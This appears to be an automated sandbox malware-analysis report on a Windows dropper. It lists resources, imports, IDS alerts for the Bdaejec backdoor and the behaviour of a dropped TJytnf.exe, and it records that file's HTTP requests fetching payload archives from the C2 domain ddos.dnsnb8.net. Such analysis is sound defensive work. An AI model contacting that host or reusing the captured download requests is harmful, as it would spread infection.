RT_CURSOR	0x33c3c8	0x134	Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"	English	United States	0.36688311688311687
RT_CURSOR	0x33c4fc	0x134	Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x33c630	0x134	data	English	United States	0.44155844155844154
RT_CURSOR	0x33c764	0x134	data	English	United States	0.4155844155844156
RT_CURSOR	0x33c898	0x134	AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	English	United States	0.5422077922077922
RT_CURSOR	0x33c9cc	0x134	data	English	United States	0.2662337662337662
RT_CURSOR	0x33cb00	0x134	data	English	United States	0.2824675324675325
RT_CURSOR	0x33cc34	0x134	data	English	United States	0.3246753246753247
RT_BITMAP	0x33cd68	0xb8	Device independent bitmap graphic, 12 x 10 x 4, image size 80	English	United States	0.44565217391304346
RT_BITMAP	0x33ce20	0x144	Device independent bitmap graphic, 33 x 11 x 4, image size 220	English	United States	0.37962962962962965
RT_ICON	0x33cf64	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.24059139784946237
RT_DIALOG	0x33d24c	0xe8	data	English	United States	0.6336206896551724
RT_DIALOG	0x33d334	0x34	data	English	United States	0.9038461538461539
RT_STRING	0x33d368	0x82	StarOffice Gallery theme p, 536899072 objects, 1st n	English	United States	0.7153846153846154
RT_STRING	0x33d3ec	0x2a	data	English	United States	0.5476190476190477
RT_STRING	0x33d418	0x184	data	English	United States	0.48711340206185566
RT_STRING	0x33d59c	0x4e6	data	English	United States	0.37719298245614036
RT_STRING	0x33da84	0x264	data	English	United States	0.3333333333333333
RT_STRING	0x33dce8	0x2da	data	English	United States	0.3698630136986301
RT_STRING	0x33dfc4	0x8a	data	English	United States	0.6594202898550725
RT_STRING	0x33e050	0xac	data	English	United States	0.45348837209302323
RT_STRING	0x33e0fc	0xde	data	English	United States	0.536036036036036
RT_STRING	0x33e1dc	0x4a8	data	English	United States	0.3221476510067114
RT_STRING	0x33e684	0x228	data	English	United States	0.4003623188405797
RT_STRING	0x33e8ac	0x2c	data	English	United States	0.5227272727272727
RT_STRING	0x33e8d8	0x53c	data	English	United States	0.2947761194029851
RT_GROUP_CURSOR	0x33ee14	0x22	Lotus unknown worksheet or configuration, revision 0x2	English	United States	1.0
RT_GROUP_CURSOR	0x33ee38	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33ee4c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33ee60	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33ee74	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33ee88	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33ee9c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33eeb0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33eec4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33eed8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33eeec	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33ef00	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33ef14	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33ef28	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33ef3c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x33ef50	0x14	data	English	United States	1.2
RT_VERSION	0x33ef64	0x62c	data	English	United States	0.4917721518987342
RT_MANIFEST	0x33f590	0x280	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.553125

Imports

DLL	Import
KERNEL32.dll	lstrcmpA, GetPrivateProfileIntA, GetPrivateProfileStringA, WritePrivateProfileStringA, InitializeCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GlobalReAlloc, GlobalHandle, SetThreadPriority, GetAtomNameA, FileTimeToSystemTime, GetThreadLocale, GlobalFlags, CompareStringW, GetLocaleInfoW, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetOEMCP, GetCPInfo, GetACP, GetCurrentDirectoryA, DeleteFileA, FlushFileBuffers, GetFullPathNameA, LockFile, SetEndOfFile, SetFilePointer, UnlockFile, DuplicateHandle, GetCurrentProcess, LoadLibraryExA, GetShortPathNameA, lstrcmpiA, MoveFileA, GetVolumeInformationA, GetStringTypeExA, GetWindowsDirectoryA, FileTimeToLocalFileTime, GetFileAttributesA, GetFileAttributesExA, GetFileSizeEx, GetFileTime, LocalFileTimeToFileTime, SetFileAttributesA, SetFileTime, GetTickCount, lstrcpyA, VerSetConditionMask, VerifyVersionInfoA, GetTempPathA, GetTempFileNameA, GetProfileIntA, VirtualProtect, GetDiskFreeSpaceA, ReplaceFileA, GetUserDefaultLCID, FindResourceExW, LocalLock, LocalUnlock, GetSystemTimeAsFileTime, RtlUnwind, GetCommandLineA, GetSystemInfo, VirtualAlloc, VirtualQuery, CreateThread, ExitThread, ExitProcess, GetModuleHandleExW, AreFileApisANSI, IsDebuggerPresent, IsProcessorFeaturePresent, HeapQueryInformation, SetStdHandle, GetFileType, IsValidCodePage, GetTimeZoneInformation, GetStdHandle, GetStartupInfoW, GetVersionExA, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, CreateEventW, TerminateProcess, CreateSemaphoreW, FatalAppExitA, SetConsoleCtrlHandler, GetStringTypeW, GetConsoleCP, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetDateFormatW, GetTimeFormatW, LCMapStringW, IsValidLocale, EnumSystemLocalesW, OutputDebugStringW, WriteConsoleW, CreateFileW, SetEnvironmentVariableA, CreateEventA, SetEvent, CompareStringA, GlobalGetAtomNameA, GlobalFindAtomA, GlobalAddAtomA, FindResourceA, LoadLibraryW, lstrcmpW, GlobalDeleteAtom, LoadLibraryExW, GetModuleHandleW, GetModuleFileNameW, FreeResource, GetSystemDirectoryW, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, LeaveCriticalSection, EnterCriticalSection, EncodePointer, OutputDebugStringA, MultiByteToWideChar, CopyFileA, FormatMessageA, MulDiv, GlobalFree, GlobalUnlock, GlobalLock, GlobalSize, GlobalAlloc, SetLastError, ReleaseSemaphore, OpenSemaphoreA, CreateSemaphoreA, WaitForSingleObject, Sleep, SearchPathA, GetFileSize, DeviceIoControl, LocalFree, LocalAlloc, WriteFile, GetVersion, GetLocalTime, ReadFile, CloseHandle, FindNextFileA, CreateFileA, SystemTimeToFileTime, GetSystemTime, FindClose, FindFirstFileA, GetProcAddress, SetErrorMode, FreeLibrary, GetModuleHandleA, GetModuleFileNameA, GetEnvironmentVariableA, GetCurrentProcessId, GetCurrentThread, ResumeThread, QueryPerformanceCounter, SuspendThread, LoadLibraryA, WideCharToMultiByte, FindResourceW, SizeofResource, LockResource, LoadResource, DeleteCriticalSection, InitializeCriticalSectionEx, GetProcessHeap, HeapSize, HeapFree, HeapReAlloc, HeapAlloc, HeapDestroy, GetLastError, RaiseException, LocalReAlloc, DecodePointer
USER32.dll	IsRectEmpty, GetNextDlgGroupItem, MessageBeep, CreatePopupMenu, GetMenuDefaultItem, BringWindowToTop, LoadAcceleratorsA, TranslateAcceleratorA, LoadMenuA, InsertMenuItemA, SetRectEmpty, LoadImageA, GetMenuBarInfo, UnpackDDElParam, ReuseDDElParam, RegisterClipboardFormatA, DrawFocusRect, DrawIconEx, GetIconInfo, GetAsyncKeyState, EnableScrollBar, HideCaret, InvertRect, NotifyWinEvent, MapVirtualKeyA, GetKeyNameTextA, UnionRect, GetSystemMenu, SetParent, PostThreadMessageA, SetLayeredWindowAttributes, EnumDisplayMonitors, OpenClipboard, CloseClipboard, SetClipboardData, EmptyClipboard, DrawStateA, LoadImageW, DrawEdge, DrawFrameControl, SetWindowRgn, IsMenu, UpdateLayeredWindow, MonitorFromPoint, TrackMouseEvent, LoadMenuW, GetComboBoxInfo, IsZoomed, GetKeyboardLayout, IsCharLowerA, MapVirtualKeyExA, GetDCEx, LockWindowUpdate, GetKeyboardState, ToAsciiEx, LoadAcceleratorsW, CreateAcceleratorTableA, DestroyAcceleratorTable, SetCursorPos, SetClassLongA, GetDoubleClickTime, CopyIcon, SetMenuDefaultItem, ModifyMenuA, CharUpperBuffA, FrameRect, EnumChildWindows, DrawMenuBar, DefFrameProcA, DefMDIChildProcA, TranslateMDISysAccel, IsClipboardFormatAvailable, GetUpdateRect, SubtractRect, SendNotifyMessageA, InSendMessage, CreateMenu, DestroyCursor, GetWindowRgn, DrawIcon, WindowFromDC, GetTabbedTextExtentA, GetTabbedTextExtentW, RealChildWindowFromPoint, IntersectRect, InflateRect, LoadCursorA, GetSystemMetrics, MapDialogRect, SetWindowContextHelpId, GetWindowThreadProcessId, SetCursor, ShowOwnedPopups, PostQuitMessage, GetCursorPos, GetMessageA, GetDesktopWindow, GetActiveWindow, GetNextDlgTabItem, EndDialog, CreateDialogIndirectParamA, IsDialogMessageA, SetWindowTextA, ScrollWindowEx, IsWindowEnabled, SendDlgItemMessageA, IsDlgButtonChecked, CheckRadioButton, CheckDlgButton, GetDlgItemTextA, SetRect, GetDlgItemInt, SetDlgItemInt, MoveWindow, ShowWindow, GetMonitorInfoA, MonitorFromWindow, WinHelpA, GetScrollInfo, SetScrollInfo, LoadIconW, LoadIconA, CallNextHookEx, UnhookWindowsHookEx, SetWindowsHookExA, GetWindow, GetLastActivePopup, GetTopWindow, GetClassNameA, GetClassLongA, SetWindowLongA, GetWindowLongA, PtInRect, EqualRect, CopyRect, MapWindowPoints, MessageBoxA, AdjustWindowRectEx, GetWindowRect, GetClientRect, GetWindowTextLengthA, GetWindowTextA, RemovePropA, GetPropA, SetPropA, ShowScrollBar, GetScrollRange, SetScrollRange, GetScrollPos, SetScrollPos, ScrollWindow, RedrawWindow, ValidateRect, SetForegroundWindow, GetForegroundWindow, SetActiveWindow, UpdateWindow, TrackPopupMenuEx, TrackPopupMenu, SetMenu, GetMenu, GetCapture, GetKeyState, SetFocus, GetDlgCtrlID, GetDlgItem, IsWindowVisible, EndDeferWindowPos, DeferWindowPos, BeginDeferWindowPos, SetWindowPlacement, GetWindowPlacement, SetWindowPos, DestroyWindow, IsChild, IsWindow, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, CallWindowProcA, DefWindowProcA, PostMessageA, GetMessageTime, GetMessagePos, RegisterWindowMessageA, LoadBitmapW, GetParent, SetMenuItemInfoA, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, EnableMenuItem, CheckMenuItem, FillRect, GetSysColor, ScreenToClient, ClientToScreen, EndPaint, BeginPaint, ReleaseDC, GetWindowDC, GetDC, TabbedTextOutA, GrayStringA, DrawTextExA, DrawTextA, RemoveMenu, AppendMenuA, InsertMenuA, GetMenuItemCount, GetMenuItemID, GetSubMenu, GetMenuState, GetMenuStringA, UnregisterClassA, EnableWindow, TranslateMessage, DispatchMessageA, PeekMessageA, SendMessageA, GetFocus, InvalidateRgn, CopyAcceleratorTableA, OffsetRect, CharNextA, LoadCursorW, WindowFromPoint, SetCapture, ReleaseCapture, WaitMessage, CharUpperA, DestroyIcon, IsIconic, InvalidateRect, KillTimer, SetTimer, DeleteMenu, GetDialogBaseUnits, CopyImage, SystemParametersInfoA, GetMenuItemInfoA, SetDlgItemTextA, DestroyMenu, GetSysColorBrush
GDI32.dll	CreateDCA, BitBlt, CreateBitmap, CreateCompatibleDC, CreateDIBPatternBrushPt, CreateHatchBrush, SetWindowExtEx, CreatePatternBrush, GetDeviceCaps, GetTextMetricsA, StartDocA, StartPage, EndPage, CreatePen, SetViewportOrgEx, SetViewportExtEx, PolylineTo, PolyBezierTo, ExtTextOutA, TextOutA, CreateRectRgn, CreateSolidBrush, DeleteDC, DeleteObject, Escape, ExcludeClipRect, MoveToEx, GetClipRgn, GetCurrentPositionEx, GetObjectType, GetPixel, GetStockObject, GetViewportExtEx, GetWindowExtEx, IntersectClipRect, LineTo, OffsetClipRgn, PlayMetaFile, PtVisible, RectVisible, RestoreDC, SaveDC, SelectClipRgn, ExtSelectClipRgn, SelectObject, SelectPalette, SetBkColor, SetBkMode, SetMapperFlags, SetGraphicsMode, SetMapMode, SetLayout, GetLayout, SetPolyFillMode, SetROP2, SetStretchBltMode, SetTextCharacterExtra, SetTextColor, SetTextAlign, SetTextJustification, PlayMetaFileRecord, GetObjectA, ExtCreatePen, SetArcDirection, SelectClipPath, PolyDraw, ArcTo, SetColorAdjustment, ModifyWorldTransform, SetWorldTransform, GetClipBox, CopyMetaFileA, DeleteMetaFile, CreateMetaFileA, CloseMetaFile, GetTextFaceA, SetWindowOrgEx, OffsetViewportOrgEx, OffsetWindowOrgEx, ScaleViewportExtEx, GetTextExtentPoint32W, GetTextExtentPointA, ScaleWindowExtEx, CombineRgn, CreateFontIndirectA, CreateRectRgnIndirect, GetMapMode, PatBlt, SetRectRgn, DPtoLP, GetTextExtentPoint32A, GetBkColor, GetTextColor, GetRgnBox, CreateCompatibleBitmap, CreatePalette, GetNearestPaletteIndex, GetPaletteEntries, GetSystemPaletteEntries, RealizePalette, CreateFontA, GetCharWidthA, StretchDIBits, CreateDIBitmap, EnumFontFamiliesA, GetTextCharsetInfo, GetDIBits, SetPixel, StretchBlt, CreateDIBSection, SetDIBColorTable, CreateEllipticRgn, Ellipse, CreatePolygonRgn, Polygon, Polyline, Rectangle, EnumFontFamiliesExA, OffsetRgn, CreateRoundRectRgn, GetCurrentObject, RoundRect, FrameRgn, PtInRegion, SetPixelV, ExtFloodFill, SetPaletteEntries, FillRgn, GetBoundsRect, GetWindowOrgEx, LPtoDP, GetViewportOrgEx, EndDoc, AbortDoc, SetAbortProc, GetROP2, GetBkMode, GetNearestColor, GetPolyFillMode, GetStretchBltMode, GetTextAlign, EnumMetaFile
COMDLG32.dll	GetOpenFileNameA
ADVAPI32.dll	RegSetValueA, RegDeleteKeyA, RegDeleteValueA, RegEnumKeyA, RegQueryValueA, RegEnumValueA, RegOpenKeyExW, RegEnumKeyExA, SetFileSecurityA, GetFileSecurityA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegCloseKey
MSIMG32.dll	TransparentBlt, AlphaBlend
SHLWAPI.dll	PathStripToRootA, PathIsUNCA, PathRemoveFileSpecW, PathRemoveExtensionA, PathFindFileNameA, PathFindExtensionA, StrFormatKBSizeA
UxTheme.dll	GetWindowTheme, GetThemeSysColor, IsAppThemed, GetThemePartSize, GetCurrentThemeName, GetThemeColor, CloseThemeData, OpenThemeData, DrawThemeParentBackground, IsThemeBackgroundPartiallyTransparent, DrawThemeBackground, DrawThemeText
oledlg.dll
OLEACC.dll	LresultFromObject, CreateStdAccessibleObject, AccessibleObjectFromWindow
gdiplus.dll	GdipDeleteGraphics, GdipCreateFromHDC, GdipSetInterpolationMode, GdipDrawImageRectI, GdipDrawImageI, GdipBitmapLockBits, GdipBitmapUnlockBits, GdipCreateBitmapFromScan0, GdipCreateBitmapFromFileICM, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromFile, GdipCreateBitmapFromStream, GdipCreateBitmapFromHBITMAP, GdiplusShutdown, GdipAlloc, GdipFree, GdiplusStartup, GdipCloneImage, GdipDisposeImage, GdipGetImageGraphicsContext, GdipGetImageWidth, GdipGetImageHeight, GdipGetImagePixelFormat, GdipGetImagePalette, GdipGetImagePaletteSize
IMM32.dll	ImmGetContext, ImmGetOpenStatus, ImmReleaseContext
WINMM.dll	PlaySoundA
WINSPOOL.DRV	DocumentPropertiesA, GetJobA, OpenPrinterA, ClosePrinter
SHELL32.dll	DragFinish, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetFileInfoA, ExtractIconA, SHAddToRecentDocs, ShellExecuteA, SHGetMalloc, SHBrowseForFolderA, SHAppBarMessage, ShellExecuteExA, DragQueryFileA
ole32.dll	StgOpenStorage, StgIsStorageFile, CreateFileMoniker, OleCreateMenuDescriptor, OleDestroyMenuDescriptor, OleTranslateAccelerator, IsAccelerator, OleGetClipboard, CoLockObjectExternal, RegisterDragDrop, RevokeDragDrop, CreateGenericComposite, CreateItemMoniker, WriteClassStm, OleCreate, OleCreateFromData, StgCreateDocfile, OleCreateStaticFromData, OleCreateLinkToFile, OleCreateFromFile, OleLoad, OleSave, OleSaveToStream, OleSetContainedObject, OleGetIconOfClass, GetHGlobalFromILockBytes, PropVariantCopy, OleRegGetMiscStatus, OleRegEnumVerbs, OleQueryLinkFromData, OleQueryCreateFromData, OleIsRunning, CoGetMalloc, GetRunningObjectTable, CreateDataAdviseHolder, CreateOleAdviseHolder, OleLockRunning, OleSetMenuDescriptor, DoDragDrop, CreateStreamOnHGlobal, CoRegisterMessageFilter, OleIsCurrentClipboard, OleFlushClipboard, OleSetClipboard, CoRevokeClassObject, CoRegisterClassObject, OleUninitialize, StringFromCLSID, CoTaskMemAlloc, OleInitialize, CoFreeUnusedLibraries, OleRun, CreateILockBytesOnHGlobal, StgOpenStorageOnILockBytes, StgCreateDocfileOnILockBytes, CoGetClassObject, CoInitializeEx, CoDisconnectObject, StringFromGUID2, CLSIDFromProgID, CLSIDFromString, CoInitialize, CoCreateInstance, CoCreateGuid, CoUninitialize, SetConvertStg, OleRegGetUserType, ReleaseStgMedium, OleDuplicateData, ReadFmtUserTypeStg, WriteFmtUserTypeStg, WriteClassStg, ReadClassStg, CreateBindCtx, CoTreatAsClass, CoTaskMemFree, OleCreateLinkFromData
OLEAUT32.dll	LoadTypeLib, SysStringLen, VariantChangeType, VariantClear, RegisterTypeLib, LoadRegTypeLib, VariantInit, SysReAllocStringLen, SystemTimeToVariantTime, VariantTimeToSystemTime, SafeArrayAllocDescriptor, SafeArrayAllocData, SysAllocStringLen, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayDestroy, SafeArrayRedim, SafeArrayGetDim, SafeArrayGetElemsize, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayLock, SafeArrayUnlock, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayGetElement, SafeArrayPutElement, SafeArrayCopy, SafeArrayPtrOfIndex, VariantCopy, SysAllocStringByteLen, SysStringByteLen, SafeArrayCreate, VarDateFromStr, VarCyFromStr, VarBstrFromCy, VarBstrFromDate, VarBstrFromDec, VarDecFromStr, OleCreateFontIndirect, SysAllocString, SysFreeString

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-24T22:22:34.069820+0200	UDP	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	62273	53	192.168.2.4	1.1.1.1
2024-07-24T22:22:34.622058+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49730	799	192.168.2.4	44.221.84.105
2024-07-24T22:22:39.755674+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49731	799	192.168.2.4	44.221.84.105

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 24, 2024 22:22:34.198359966 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 24, 2024 22:22:34.203314066 CEST	799	49730	44.221.84.105	192.168.2.4
Jul 24, 2024 22:22:34.203393936 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 24, 2024 22:22:34.205147982 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 24, 2024 22:22:34.211429119 CEST	799	49730	44.221.84.105	192.168.2.4
Jul 24, 2024 22:22:34.621977091 CEST	799	49730	44.221.84.105	192.168.2.4
Jul 24, 2024 22:22:34.622057915 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 24, 2024 22:22:34.622462034 CEST	799	49730	44.221.84.105	192.168.2.4
Jul 24, 2024 22:22:34.622654915 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 24, 2024 22:22:34.626636028 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 24, 2024 22:22:34.631470919 CEST	799	49730	44.221.84.105	192.168.2.4
Jul 24, 2024 22:22:39.354032993 CEST	49731	799	192.168.2.4	44.221.84.105
Jul 24, 2024 22:22:39.359157085 CEST	799	49731	44.221.84.105	192.168.2.4
Jul 24, 2024 22:22:39.359257936 CEST	49731	799	192.168.2.4	44.221.84.105
Jul 24, 2024 22:22:39.359735966 CEST	49731	799	192.168.2.4	44.221.84.105
Jul 24, 2024 22:22:39.365240097 CEST	799	49731	44.221.84.105	192.168.2.4
Jul 24, 2024 22:22:39.755600929 CEST	799	49731	44.221.84.105	192.168.2.4
Jul 24, 2024 22:22:39.755673885 CEST	49731	799	192.168.2.4	44.221.84.105
Jul 24, 2024 22:22:39.756247997 CEST	799	49731	44.221.84.105	192.168.2.4
Jul 24, 2024 22:22:39.756293058 CEST	49731	799	192.168.2.4	44.221.84.105
Jul 24, 2024 22:22:52.623936892 CEST	49731	799	192.168.2.4	44.221.84.105

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 24, 2024 22:22:34.069819927 CEST	62273	53	192.168.2.4	1.1.1.1
Jul 24, 2024 22:22:34.170281887 CEST	53	62273	1.1.1.1	192.168.2.4
Jul 24, 2024 22:22:41.318310022 CEST	53	50317	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 24, 2024 22:22:34.069819927 CEST	192.168.2.4	1.1.1.1	0x8ca8	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 24, 2024 22:22:34.170281887 CEST	1.1.1.1	192.168.2.4	0x8ca8	No error (0)	ddos.dnsnb8.net		44.221.84.105	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ddos.dnsnb8.net:799

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	44.221.84.105	799	7356	C:\Users\user\AppData\Local\Temp\TJytnf.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 22:22:34.205147982 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	44.221.84.105	799	7356	C:\Users\user\AppData\Local\Temp\TJytnf.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 22:22:39.359735966 CEST	288	OUT	GET /cj//k2.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Target ID:	0
Start time:	16:22:33
Start date:	24/07/2024
Path:	C:\Users\user\Desktop\biKy3nZEyJ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\biKy3nZEyJ.exe"
Imagebase:	0x400000
File size:	3'101'704 bytes
MD5 hash:	6963BB0311DED02BA57657BA4A61D427
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	16:22:33
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\TJytnf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\TJytnf.exe
Imagebase:	0xc00000
File size:	15'872 bytes
MD5 hash:	56B2C3810DBA2E939A8BB9FA36D3CF96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	16:22:39
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7356 -s 1580
Imagebase:	0xae0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	87.5%
Total number of Nodes:	8
Total number of Limit Nodes:	1

Executed Functions

Function 00740044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00740223
WriteFile.KERNELBASE(00000000,FFEC74CC,00003E00,?,00000000), ref: 00740252
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00740256
WinExec.KERNEL32(?,00000005), ref: 00740262

Strings

catA, xrefs: 007401AF
GetT, xrefs: 00740188
WinE, xrefs: 00740110
Kern, xrefs: 007400F4
.dll, xrefs: 00740102
odul, xrefs: 0074022D
Crea, xrefs: 00740169
athA, xrefs: 00740199
Writ, xrefs: 00740148
lstr, xrefs: 007401A7
dleA, xrefs: 007400D0
Clos, xrefs: 00740129
TJytnf.exe, xrefs: 007401FD, 00740200
el32, xrefs: 007400FB
GetM, xrefs: 007400B6

Memory Dump Source

Source File: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID: File$ChangeCloseCreateExecFindNotificationWrite
String ID: .dll$Clos$Crea$GetM$GetT$Kern$TJytnf.exe$WinE$Writ$athA$catA$dleA$el32$lstr$odul
API String ID: 2234911746-2051679233
Opcode ID: e199eddd33a27495d627918e3a499fccf7fe6845e9a388fd4e39f2dae1141158
Instruction ID: 586f86233e2cf17913a23bd254e9a1c0644a6c8c069bb837390bc4b2348fd581
Opcode Fuzzy Hash: e199eddd33a27495d627918e3a499fccf7fe6845e9a388fd4e39f2dae1141158
Instruction Fuzzy Hash: E7611775D0121ADBCF24CF94C884ABDFBB4BF48315F2586AAD605AB641C3789E81CBD1

Non-executed Functions

Function 00451E50 Relevance: 1.6, Strings: 1, Instructions: 356COMMON

Download Yara Rule

Strings

&$D, xrefs: 00451E55

Memory Dump Source

Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
